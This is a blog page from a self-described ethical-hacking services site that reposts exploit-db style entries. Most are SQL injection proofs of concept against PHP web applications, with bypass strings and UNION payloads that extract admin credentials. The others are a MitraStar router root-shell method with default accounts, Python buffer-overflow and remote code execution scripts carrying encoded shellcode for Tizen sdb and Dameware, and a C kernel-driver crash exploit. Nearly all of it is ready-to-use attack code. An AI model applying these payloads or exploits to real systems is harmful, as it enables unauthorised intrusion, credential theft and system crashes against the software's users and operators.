Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863577183

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# # # # # 
# Exploit Title: tPanel 2009 - Authentication Bypass 
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: http://www.datacomponents.net/
# Software Link: http://www.datacomponents.net/products/hosting/tpanel/
# Demo: http://demo.datacomponents.net/tpanel/
# Version: 2009
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-15974
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 
# Proof of Concept: 
# 
# 
# http://localhost/[PATH]/login.php
# 
# User: 'or 1=1 or ''=' Pass: anything
# 
# Etc..
# # # # #
HireHackking 
# # # # # 
# Exploit Title: Vastal I-Tech Dating Zone 0.9.9 - 'product_id' Parameter SQL Injection
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: http://vastal.com/
# Software http://vastal.com/dating-zone-the-dating-software.html
# Demo: http://datingzone.vastal.com/demo/
# Version: 0.9.9
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-15975
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 
# Proof of Concept: 
# 
# http://localhost/[PATH]/add_to_cart.php?product_id=[SQL]
# 
# Parameter: product_id (GET)
#     Type: error-based
#     Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
#     Payload: product_id=3 AND (SELECT 5917 FROM(SELECT COUNT(*),CONCAT(0x7176626a71,(SELECT (ELT(5917=5917,1))),0x71716b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
# 
#     Type: AND/OR time-based blind
#     Title: MySQL >= 5.0.12 AND time-based blind
#     Payload: product_id=3 AND SLEEP(5)
# 	
# Etc..
# # # # #
HireHackking 
# # # # # 
# Exploit Title: ZeeBuddy 2x - SQL Injection
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: http://www.zeescripts.com/
# Software Link: http://www.zeebuddy.com/
# Demo: http://www.zeebuddy.com/demo/
# Version: 2x
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-15976
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 
# Proof of Concept: 
# 
# http://localhost/[PATH]/admin/editadgroup.php?groupid=[SQL]
# 
# -1++/*!00009UNION*/+/*!00009SELECT*/+0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,(SELECT+GROUP_CONCAT(0x557365726e616d653a,name,0x3c62723e,0x50617373776f72643a,pwd+SEPARATOR+0x3c62723e)+FROM+admin)--+-
# 
# Parameter: groupid (GET)
#     Type: boolean-based blind
#     Title: AND boolean-based blind - WHERE or HAVING clause
#     Payload: groupid=1 AND 3188=3188
# 
#     Type: AND/OR time-based blind
#     Title: MySQL >= 5.0.12 AND time-based blind
#     Payload: groupid=1 AND SLEEP(5)
# 
#     Type: UNION query
#     Title: Generic UNION query (NULL) - 9 columns
#     Payload: groupid=1 UNION ALL SELECT CONCAT(0x71707a7071,0x754642515970647855775a494a486368477a6e45755355495050634270466969495966676b78536c,0x7162767071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- oMUM
# 	
# Etc..
# # # # #
HireHackking 
<!--
# # # # # 
# Exploit Title: Protected Links - Expiring Download Links - SQL Injection
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: http://sixthlife.net/
# Software Link: https://codecanyon.net/item/protected-links-expiring-download-links/2556861
# Demo: http://protectedlinks.net/demo/
# Version: N/A
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-15977
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 
# Proof of Concept: 
# 
# http://localhost/[PATH]/admin
# 
# User: 'or 1=1 or ''=' Pass: anything
# 
# Etc..
# # # # #
-->
<form name="login" method="post" action="http://localhost/[PATH]/index.php">
<div id="login">
<table width="200" border="0">
<tr>
<td height="45"><p>Username</p></td>
<td><label for="textfield"></label>
<input type="text" name="username" id="textfield" value="' UNION ALL SELECT 1,CONCAT(VERSiON(),0x494853414e2053454e43414e),3,4,CONCAT(0x494853414e2053454e43414e)-- Ver Ayari"/></td>
</tr>
<tr>
<td height="45">Password</td>
<td><label for="textfield"></label>
<input type="password" name="password" id="textfield" value="Ver Ayari"/></td>
</tr>
</table>
</div>
<input type="submit" name="submit" value="LOGIN" />
</form>
HireHackking 
# # # # # 
# Exploit Title: AROX School ERP PHP Script - SQL Injection
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: http://arox.in/
# Software Link: https://www.codester.com/items/4908/arox-school-erp-php-script
# Demo: http://erp1.arox.in/
# Version: CVE-2017-15978
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 
# Proof of Concept: 
# 
# http://localhost/[PATH]/office_admin/?pid=95&action=print_charactercertificate&id=[SQL]
# http://localhost/[PATH]/office_admin/?pid=95&action=edit&id=3[SQL]
# 
# Parameter: id (GET)
#     Type: AND/OR time-based blind
#     Title: MySQL >= 5.0.12 AND time-based blind
#     Payload: pid=95&action=print_charactercertificate&id=3 AND SLEEP(5)
# 
# Parameter: id (GET)
#     Type: AND/OR time-based blind
#     Title: MySQL >= 5.0.12 AND time-based blind
#     Payload: pid=95&action=edit&id=3 AND SLEEP(5)
# 
# Etc..
# # # # #
HireHackking 
# # # # # 
# Exploit Title: Shareet - Photo Sharing Social Network - SQL Injection
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: https://odallated.com/
# Software Link: https://www.codester.com/items/4910/shareet-photo-sharing-social-network
# Demo: https://odallated.com/shareet/demo/
# Version: N/A
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-15979
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 
# Proof of Concept: 
# 
# http://localhost/[PATH]/?photo=[SQL]
# 
# Parameter: photo (GET)
#     Type: AND/OR time-based blind
#     Title: MySQL >= 5.0.12 AND time-based blind
#     Payload: photo=saSihSiRf1E' AND SLEEP(5) AND 'DUqs'='DUqs
# 
# Etc..
# # # # #
HireHackking 
# # # # # 
# Exploit Title: US Zip Codes Database Script - SQL Injection
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: http://rowindex.com/
# Software Link: https://www.codester.com/items/4898/us-zip-codes-database-php-script
# Demo: http://rowindex.com/demo/
# Version: N/A
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-15980
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 
# Proof of Concept: 
# 
# http://localhost/[PATH]/index.php?action=lookup-county&state=[SQL]
# 
# 11'+/*!08888UniOn*/+/*!08888Select*/+(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2))--+-
# 
# Parameter: state (GET)
#     Type: UNION query
#     Title: Generic UNION query (NULL) - 1 column
#     Payload: action=lookup-county&state=' UNION ALL SELECT CONCAT(0x716a717071,0x766a414e736e79524546725053474f72754d764a4772697a65666a7551464b46435141414d4e616c,0x7170707071)-- hvbM
# 
# Etc..
# # # # #
HireHackking 
# # # # # 
# Exploit Title: Newspaper Magazine & Blog CMS 1.0 - SQL Injection
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: http://geniusocean.com/
# Software Link: https://codecanyon.net/item/mymagazine-fully-responsive-magazine-cms/19493325
# Demo: http://demo.geniusocean.com/newspaper/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-15981
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
# 
# Proof of Concept: 
# 
# http://localhost/[PATH]/admin/admin_process.php?act=editpollform&id=[SQL]
# 
# -2'++/*!00022UNION*/+/*!00022SELECT*/+0x31,(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),0x33,0x34,0x35,VerSiOn(),dAtAbAsE(),0x38,0x39,0x3130,0x3131,0x3132--+-
# 
# http://localhost/[PATH]/admin/admin_process.php?act=cateditform&id=[SQL]
# 
# -2'++/*!00022UNION*/+/*!00022SELECT*/+0x31,/*!00022cOnCat*/(username,0x3a,password),0x33,0x34,0x35+/*!00022from*/+admin--+-
# 
# Etc..
# # # # #
HireHackking 
###################################################
[+] Author : Venkat Rajgor
[+] Email : Venki9990@gmail.com
[+] Vulnerability : SQL injection
###################################################
E-mail ID : support@phpsugar.com
Download : http://www.phpsugar.com
Web : http://www.phpsugar.com
Price : $39 USD
###################################################
Vulnerable parameter: http://x.x.x.x/playlists.php?playlist=
Application : PHPSUGAR PHP Melody version 2.6.1
Vulnerability : PHPSUGAR PHP Melody 2.6.1 SQL Injection
###################################################

Description : In PHPSUGAR PHP Melody CMS 2.6.1, SQL Injection exists via the playlist parameter to playlists.php.

Payload Used : ' UNION SELECT null,concat(0x223c2f613e3c2f64 69763e3c2f6469763e,version(),0 x3c212d2d),null,null,null,null ,null,null,null,null,null-- -
HireHackking 
# Exploit Title: Privilege escalation MitraStar routers
# Date: 28-10-2017
# Exploit Author: j0lama
# Vendor Homepage: http://www.mitrastar.com/
# Provider Homepage: https://www.movistar.com/
# Models affected: MitraStar DSL-100HN-T1 and MitraStar GPT-2541GNAC (HGU)
# Software versions: ES_113WJY0b16 (DSL-100HN-T1) and 1.00(VNJ0)b1 (GPT-2541GNAC)
# Vulnerability analysis: http://jolama.es/temas/router-attack/index.php

Description
-----------
SSH has a bad configuration that allows execute commands when you connect avoiding the default shell that the manufacturer provide us.

$ ssh 1234@ip /bin/sh

This give us a shell with root permissions.

Note: the password for 1234 user is under the router.

You can copy all file system to your local machine using scp.
In some of the MitraStar routers there is a zyad1234 user with password zyad1234 that have the same permissions of the 1234 user (root).


Solution
--------
In the latest firmware versions this have been fixed. 
If you try to execute scp, the router's configuration file will be copy to your computer instead of any file as occurred before.
HireHackking 
# Exploit Title: Smart Development Bridge <=2.3.2 (part of Tizen Studio 1.3 Windows x86/x64) - Buffer Overflow PoC
# Date: 22.10.17
# Exploit Author: Marcin Kopec
# Vendor Homepage: https://developer.tizen.org/
# Software Link: https://developer.tizen.org/development/tizen-studio/download#
# Version: 2.3.0, 2.3.2 (some older versions are affected as well)
# Tested on: Microsoft Windows [Version 10.0.16299.19]
# 2.3.2 (sdb.exe can be extracted from Tizen Studio 1.3 for Windows x86/x64 installation package):
# e88de99ee069412b7612d85c00aa62fc  sdb.exe
# 2.3.0:
# f9fd3896195900ec604c6f182a411e18  sdb.exe
# The file can be located in "tools" subdirectory after the extraction

# This code has been created for educational purposes only, to raise awareness on software security, and it's harmless
# by intention (the PoC runs calc.exe). Please do not change the code behaviour to malicious

# Vulnerability Discovery History
# 28/Jul/16 - Tizen Project has been informed about the vulnerability (https://bugs.tizen.org/browse/TM-249)
# 28/Jul/16 - Got suggestion from CL to inform Tizen Mobile project
# 29/Jul/16 - Moved the issue to Tizen Mobile project
# - NO RESPONSE -
# 7/Sep/16 - Escalated through Samsung security contact (BZ)
# 14/Nov/16 - Got informed by BZ that HQ is dealing with the issue with no further details
# - NO RESPONSE -
# 02/Oct/17 - Tizen Mobile project has been informed about plans to release PoC on exploit-db
# - NO RESPONSE -
# 22/Oct/17 - The PoC submitted to exploit-db


import struct
import subprocess
import sys

ARGS = " launch A A A A A "


def tech_direct_exec(sdb_path):
    # msfvenom -a x86 --platform Windows -p windows/exec CMD=calc -e x86/shikata_ga_nai \
    # -b '\x00\x20\x0a\x0d\x1b\x0b\x0c' -f python
    buf = ""
    buf += "\xb8\xb6\x98\xe6\xfa\xdb\xcb\xd9\x74\x24\xf4\x5b\x31"
    buf += "\xc9\xb1\x30\x31\x43\x13\x83\xeb\xfc\x03\x43\xb9\x7a"
    buf += "\x13\x06\x2d\xf8\xdc\xf7\xad\x9d\x55\x12\x9c\x9d\x02"
    buf += "\x56\x8e\x2d\x40\x3a\x22\xc5\x04\xaf\xb1\xab\x80\xc0"
    buf += "\x72\x01\xf7\xef\x83\x3a\xcb\x6e\x07\x41\x18\x51\x36"
    buf += "\x8a\x6d\x90\x7f\xf7\x9c\xc0\x28\x73\x32\xf5\x5d\xc9"
    buf += "\x8f\x7e\x2d\xdf\x97\x63\xe5\xde\xb6\x35\x7e\xb9\x18"
    buf += "\xb7\x53\xb1\x10\xaf\xb0\xfc\xeb\x44\x02\x8a\xed\x8c"
    buf += "\x5b\x73\x41\xf1\x54\x86\x9b\x35\x52\x79\xee\x4f\xa1"
    buf += "\x04\xe9\x8b\xd8\xd2\x7c\x08\x7a\x90\x27\xf4\x7b\x75"
    buf += "\xb1\x7f\x77\x32\xb5\xd8\x9b\xc5\x1a\x53\xa7\x4e\x9d"
    buf += "\xb4\x2e\x14\xba\x10\x6b\xce\xa3\x01\xd1\xa1\xdc\x52"
    buf += "\xba\x1e\x79\x18\x56\x4a\xf0\x43\x3c\x8d\x86\xf9\x72"
    buf += "\x8d\x98\x01\x22\xe6\xa9\x8a\xad\x71\x36\x59\x8a\x8e"
    buf += "\x7c\xc0\xba\x06\xd9\x90\xff\x4a\xda\x4e\xc3\x72\x59"
    buf += "\x7b\xbb\x80\x41\x0e\xbe\xcd\xc5\xe2\xb2\x5e\xa0\x04"
    buf += "\x61\x5e\xe1\x66\xe4\xcc\x69\x69"

    stack_adj = "\x83\xEC\x7F" * 2  # SUB ESP,0x7F - stack adjustment
    sc = stack_adj + buf

    eip = "\x01\xed\x8b"  # 008BED01 - 3 byte EIP overwrite
    payload = "B" * 2000 + "\x90" * (2086 - len(sc) - 1) + "\x90" + sc + eip

    print "Trying to exploit the binary... "
    print "Payload length: " + str(len(payload))
    print sdb_path + ARGS + payload

    subprocess.Popen([sdb_path, "launch", "A", "A", "A", "A", "A", payload], stdout=subprocess.PIPE)


def tech_social_ascii(sdb_path, jmp_esp_addr):
    eip = struct.pack('<L', int(jmp_esp_addr, 0))
    # msfvenom -a x86 --platform Windows -p windows/exec CMD=calc -e x86/alpha_mixed BufferRegister=ESP -f python
    buf = ""
    buf += "\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
    buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
    buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
    buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
    buf += "\x6b\x4c\x4d\x38\x4e\x62\x77\x70\x63\x30\x35\x50\x71"
    buf += "\x70\x6f\x79\x79\x75\x50\x31\x69\x50\x62\x44\x6c\x4b"
    buf += "\x32\x70\x34\x70\x6e\x6b\x76\x32\x36\x6c\x6c\x4b\x63"
    buf += "\x62\x45\x44\x6e\x6b\x61\x62\x37\x58\x76\x6f\x6f\x47"
    buf += "\x70\x4a\x51\x36\x44\x71\x69\x6f\x4c\x6c\x45\x6c\x55"
    buf += "\x31\x61\x6c\x36\x62\x54\x6c\x47\x50\x39\x51\x78\x4f"
    buf += "\x74\x4d\x67\x71\x69\x57\x68\x62\x6b\x42\x36\x32\x53"
    buf += "\x67\x4c\x4b\x61\x42\x52\x30\x6c\x4b\x31\x5a\x67\x4c"
    buf += "\x4e\x6b\x32\x6c\x57\x61\x53\x48\x59\x73\x62\x68\x67"
    buf += "\x71\x48\x51\x36\x31\x6c\x4b\x31\x49\x47\x50\x35\x51"
    buf += "\x38\x53\x6e\x6b\x30\x49\x55\x48\x68\x63\x34\x7a\x31"
    buf += "\x59\x4c\x4b\x50\x34\x6c\x4b\x33\x31\x5a\x76\x70\x31"
    buf += "\x6b\x4f\x6c\x6c\x79\x51\x78\x4f\x46\x6d\x35\x51\x58"
    buf += "\x47\x50\x38\x39\x70\x70\x75\x79\x66\x64\x43\x43\x4d"
    buf += "\x4c\x38\x55\x6b\x63\x4d\x61\x34\x70\x75\x6d\x34\x72"
    buf += "\x78\x4e\x6b\x61\x48\x45\x74\x47\x71\x78\x53\x72\x46"
    buf += "\x6c\x4b\x44\x4c\x62\x6b\x4c\x4b\x51\x48\x35\x4c\x43"
    buf += "\x31\x69\x43\x6c\x4b\x67\x74\x4e\x6b\x55\x51\x6e\x30"
    buf += "\x6b\x39\x50\x44\x65\x74\x37\x54\x53\x6b\x63\x6b\x73"
    buf += "\x51\x72\x79\x71\x4a\x72\x71\x4b\x4f\x59\x70\x43\x6f"
    buf += "\x33\x6f\x32\x7a\x4e\x6b\x62\x32\x5a\x4b\x4e\x6d\x51"
    buf += "\x4d\x32\x4a\x65\x51\x6e\x6d\x6b\x35\x6e\x52\x55\x50"
    buf += "\x73\x30\x63\x30\x46\x30\x30\x68\x55\x61\x4c\x4b\x52"
    buf += "\x4f\x4f\x77\x69\x6f\x5a\x75\x4d\x6b\x6c\x30\x6f\x45"
    buf += "\x4c\x62\x53\x66\x30\x68\x79\x36\x4a\x35\x4d\x6d\x6f"
    buf += "\x6d\x6b\x4f\x39\x45\x75\x6c\x55\x56\x53\x4c\x56\x6a"
    buf += "\x6b\x30\x39\x6b\x6b\x50\x64\x35\x76\x65\x4d\x6b\x32"
    buf += "\x67\x42\x33\x62\x52\x32\x4f\x71\x7a\x45\x50\x31\x43"
    buf += "\x69\x6f\x6e\x35\x61\x73\x31\x71\x52\x4c\x73\x53\x75"
    buf += "\x50\x41\x41"

    stack_adj = "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A"
    stack_adj += "\x2d\x66\x4f\x66\x47\x2d\x4c\x31\x4c\x36\x2d\x67\x39\x6a\x2a\x2d\x57\x57\x57\x57\x50"
    stack_adj += "\x50\x5C" + "A" * 4
    ascii_nop_sleed = "C" * 70
    payload = sdb_path + ARGS + "A" * 4086 + eip + "\x77\x21\x42\x42\x20" + ascii_nop_sleed + stack_adj + buf
    print "Now sdb.exe user could be asked to run the following code from cmd line:"
    print payload
    f = open("sdb_poc.txt", 'w')
    f.write(payload)
    f.close()
    print "The payload has been also saved to sdb_poc.txt file for your convenience"


def bonus_exercise():
    print """Can you spot the bug here?
    
int launch_app(int argc, char** argv)
{
	static const char *const SHELL_LAUNCH_CMD = "shell:/usr/bin/sdk_launch_app ";
	char full_cmd[4096];
	int i;
	
	snprintf(full_cmd, sizeof full_cmd, "%s", SHELL_LAUNCH_CMD);

	for (i=1 ; i<argc ; i++) {
		strncat(full_cmd, " ", sizeof(full_cmd)-strlen(" ")-1);
		strncat(full_cmd, argv[i], sizeof(full_cmd)-strlen(argv[i])-1);
	}
}       
"""


def usage():
    print """Smart Development Bridge <=2.3.2 (part of Tizen Studio 1.3 Windows x86/x64) - Buffer Overflow PoC
by Marcin Kopec <m a r c i n \. k o p e c @ h o t m a i l . c o m>

Demonstrated Exploitation Techniques: 
1: Direct execution, 3-byte EIP overwrite, Stack adjustment
2: Payload for social engineering attack, JMP ESP (!mona find -s "\\xff\\xe4" -cp alphanum), Alphanumeric shellcode
3: Bonus exercise - source code analysis

This code has been created for educational purposes only, to raise awareness on software security, and it's harmless 
by intention (the PoC runs calc.exe). Please do not change the code behaviour to malicious

Usage: python sdbBOpoc.py [Technique_ID] [Path_to_sdb.exe] [Address_of_JMP_ESP]
Examples: python sdbBOpoc.py 1 C:\Tizen\Tools\sdb.exe
          python sdbBOpoc.py 2 C:\Tizen\Tools\sdb.exe 0x76476557
          python sdbBOpoc.py 3"""


def main():
    if len(sys.argv) > 1:
        if int(sys.argv[1]) == 1:
            if len(sys.argv) == 3:
                tech_direct_exec(sys.argv[2])
        if int(sys.argv[1]) == 2:
            if len(sys.argv) == 4:
                tech_social_ascii(sys.argv[2], sys.argv[3])
        if int(sys.argv[1]) == 3:
            bonus_exercise()
    else:
        usage()


if __name__ == '__main__':
    main()
HireHackking 
# Exploit Title: Dameware Remote Controller RCE
# Date: 3-04-2016
# Exploit Author: Securifera
# Vendor Homepage: http://www.dameware.com/products/mini-remote-control/product-overview.aspx
# Version: 12.0.0.520
# Website: https://www.securifera.com/blog/2016/04/03/fun-with-remote-controllers-dameware-mini-remote-control-cve-2016-2345/
# CVE : CVE-2016-2345

import socket
import sys
import os
import time
import struct
import binascii
import random

# windows/exec - 220 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, PrependMigrate=false, EXITFUNC=process,
# CMD=calc.exe
sc = ""
sc += "\xba\x01\xa8\x4f\x9e\xd9\xca\xd9\x74\x24\xf4\x5e\x29"
sc += "\xc9\xb1\x31\x31\x56\x13\x03\x56\x13\x83\xee\xfd\x4a"
sc += "\xba\x62\x15\x08\x45\x9b\xe5\x6d\xcf\x7e\xd4\xad\xab"
sc += "\x0b\x46\x1e\xbf\x5e\x6a\xd5\xed\x4a\xf9\x9b\x39\x7c"
sc += "\x4a\x11\x1c\xb3\x4b\x0a\x5c\xd2\xcf\x51\xb1\x34\xee"
sc += "\x99\xc4\x35\x37\xc7\x25\x67\xe0\x83\x98\x98\x85\xde"
sc += "\x20\x12\xd5\xcf\x20\xc7\xad\xee\x01\x56\xa6\xa8\x81"
sc += "\x58\x6b\xc1\x8b\x42\x68\xec\x42\xf8\x5a\x9a\x54\x28"
sc += "\x93\x63\xfa\x15\x1c\x96\x02\x51\x9a\x49\x71\xab\xd9"
sc += "\xf4\x82\x68\xa0\x22\x06\x6b\x02\xa0\xb0\x57\xb3\x65"
sc += "\x26\x13\xbf\xc2\x2c\x7b\xa3\xd5\xe1\xf7\xdf\x5e\x04"
sc += "\xd8\x56\x24\x23\xfc\x33\xfe\x4a\xa5\x99\x51\x72\xb5"
sc += "\x42\x0d\xd6\xbd\x6e\x5a\x6b\x9c\xe4\x9d\xf9\x9a\x4a"
sc += "\x9d\x01\xa5\xfa\xf6\x30\x2e\x95\x81\xcc\xe5\xd2\x7e"
sc += "\x87\xa4\x72\x17\x4e\x3d\xc7\x7a\x71\xeb\x0b\x83\xf2"
sc += "\x1e\xf3\x70\xea\x6a\xf6\x3d\xac\x87\x8a\x2e\x59\xa8"
sc += "\x39\x4e\x48\xcb\xdc\xdc\x10\x22\x7b\x65\xb2\x3a"

port = 6129

if len (sys.argv) == 2:
 (progname, host ) = sys.argv
else:
 print len (sys.argv)
 print 'Usage: {0} host'.format (sys.argv[0])
 exit (1)

csock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)
csock.connect ( (host, int(port)) )

type = 444.0
buf = struct.pack("I", 4400 ) #Init Version
buf += "\xcc"*4
buf += struct.pack("d", type) #Minor Version
buf += struct.pack("d", type) #Minor Version
buf += (40 - len(buf)) * "C"
csock.send(buf)

wstr = "\x90" * 0x10 #nop sled
wstr += sc #calc shellcode
wstr += "\x90" * (0x2ac - 0x10 - len(sc))
wstr += "\xeb\x06\xff\xff" #short jump forward
wstr += struct.pack("I", 0x00401161 ) #pop pop return gadget
wstr += "\x90" * 3 #nop
wstr += "\xe9\x6b\xfa\xff\xff" #short jump back to shellcode
wstr += "E" * 0xbc
wstr += ("%" + "\x00" + "c" + "\x00")*5

buf = struct.pack("I", 0x9c44) #msg type
buf += wstr #payload
buf += "\x00" * (0x200) #null bytes
csock.send(buf)

print binascii.hexlify(csock.recv(0x4000)) #necessary reads
print binascii.hexlify(csock.recv(0x4000))

csock.close()
HireHackking 
/*

Exploit Title    - Watchdog Development Anti-Malware/Online Security Pro Null Pointer Dereference
Date             - 26th October 2017
Discovered by    - Parvez Anwar (@parvezghh)
Vendor Homepage  - https://www.watchdogdevelopment.com/
Tested Version   - 2.74.186.150
Driver Version   - 2.21.63 - zam32.sys
Tested on OS     - 32bit Windows 7 SP1 
CVE IDs          - CVE-2017-15920 and CVE-2017-15921
Vendor fix url   - Will be fixed in a future release
Fixed Version    - n/a
Fixed driver ver - n/a



A null pointer dereference vulnerability is triggered when sending an operation
to ioctls 0x80002010 or 0x80002054. This is due to input buffer being NULL or
the input buffer size being 0 as they are not validated.

kd> dt nt!_irp @esi -r
   +0x000 Type             : 0n6
   +0x002 Size             : 0x94
   +0x004 MdlAddress       : (null) 
   +0x008 Flags            : 0x60000
   +0x00c AssociatedIrp    : <unnamed-tag>
      +0x000 MasterIrp        : (null) 
      +0x000 IrpCount         : 0n0
      +0x000 SystemBuffer     : (null)  <----------- null pointer


0x80002010
----------
CVE-2017-15921

kd> r
eax=00000000 ebx=80002010 ecx=cff82bd9 edx=90889f2e esi=00000000 edi=c0000001
eip=9087cd9f esp=a7a80ab8 ebp=a7a80ab8 iopl=0         nv up ei pl nz na po nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00000202
zam32+0xdd9f:
9087cd9f ff30            push    dword ptr [eax]      ds:0023:00000000=????????


.text:90AD9104                 push    offset aIoctl_register                        ; "IOCTL_REGISTER_PROCESS"
.text:90AD9109                 push    0                                             
.text:90AD910B                 push    edx                                           ; Pointer to "DeviceIoControlHandler" string
.text:90AD910C                 push    208h
.text:90AD9111                 push    offset aMain_c                                
.text:90AD9116                 push    1
.text:90AD9118                 call    sub_90AD3ADA
.text:90AD911D                 add     esp, 18h
.text:90AD9120                 push    esi                                           ; esi is null becomes arg_0 otherwise would point to our input "SystemBuffer"
.text:90AD9121                 call    sub_90AD8D90

.text:90AD8D90 sub_90AD8D90    proc near                                             
.text:90AD8D90
.text:90AD8D90 arg_0           = dword ptr  8
.text:90AD8D90
.text:90AD8D90                 push    ebp                                           
.text:90AD8D91                 mov     ebp, esp
.text:90AD8D93                 call    sub_90AD414A
.text:90AD8D98                 test    eax, eax
.text:90AD8D9A                 jz      short loc_90AD8DA6
.text:90AD8D9C                 mov     eax, [ebp+arg_0]                              ; Null pointer dereference 
.text:90AD8D9F                 push    dword ptr [eax]                               ; BSOD !!!!
.text:90AD8DA1                 call    sub_90AD428C
.text:90AD8DA6
.text:90AD8DA6 loc_90AD8DA6:                                                         
.text:90AD8DA6                 pop     ebp
.text:90AD8DA7                 retn    4
.text:90AD8DA7 sub_90AD8D90    endp
.text:90AD8DA7
.text:90AD8DAA


0x80002054
----------
CVE-2017-15920

kd> r
eax=861e8320 ebx=80002054 ecx=cff82bd9 edx=90889f2e esi=00000000 edi=c0000001
eip=9087d41a esp=99f4eaac ebp=99f4eadc iopl=0         nv up ei pl zr na pe nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00000246
zam32+0xe41a:
9087d41a c7061e010000    mov     dword ptr [esi],11Eh ds:0023:00000000=????????


.text:90AD9401                 push    offset aIoctl_get_driv                        ; IOCTL_GET_DRIVER_PROTOCOL
.text:90AD9406                 push    0
.text:90AD9408                 push    edx
.text:90AD9409                 push    2A3h
.text:90AD940E                 push    offset aMain_c                                
.text:90AD9413                 push    1
.text:90AD9415                 call    sub_90AD3ADA
.text:90AD941A                 mov     dword ptr [esi], 11Eh                         ; BSOD !!!! Null pointer dereference otherwise would point to our input "SystemBuffer"
.text:90AD9420                 jmp     loc_90AD9622


*/


#include <stdio.h>
#include <windows.h>

int main(int argc, char *argv[]) 
{
    HANDLE         hDevice;
    char           devhandle[MAX_PATH];
    DWORD          dwRetBytes = 0;


    sprintf(devhandle, "\\\\.\\%s", "zemanaantimalware");

    hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
    
    if(hDevice == INVALID_HANDLE_VALUE)
    {
        printf("\n[-] Open %s device failed\n\n", devhandle);
        return -1;
    }
    else 
    {
        printf("\n[+] Open %s device successful", devhandle);
    }	

    printf("\n[~] Press any key to continue . . .");
    getch();

    DeviceIoControl(hDevice, 0x80002010, NULL, 0, NULL, 0, &dwRetBytes, NULL);
//  DeviceIoControl(hDevice, 0x80002054, NULL, 0, NULL, 0, &dwRetBytes, NULL);

    printf("\n[+] DoSed\n\n");
 
    CloseHandle(hDevice);
    return 0;
}
HireHackking 
# Exploit Title: PHPMailer <= 5.2.21 - Local File Disclosure (CVE-2017-5223)
# Date: 2017-10-25
# Exploit Author: Maciek Krupa
# All credit only to Yongxiang Li of Asiasecurity
# Software Link: https://github.com/PHPMailer/PHPMailer
# Version: 5.2.21
# Tested on: Linux Debian 9
# CVE : CVE-2017-5223

// PoC //

It requires a contact form that sends HTML emails and allows to send a copy to your e-mail

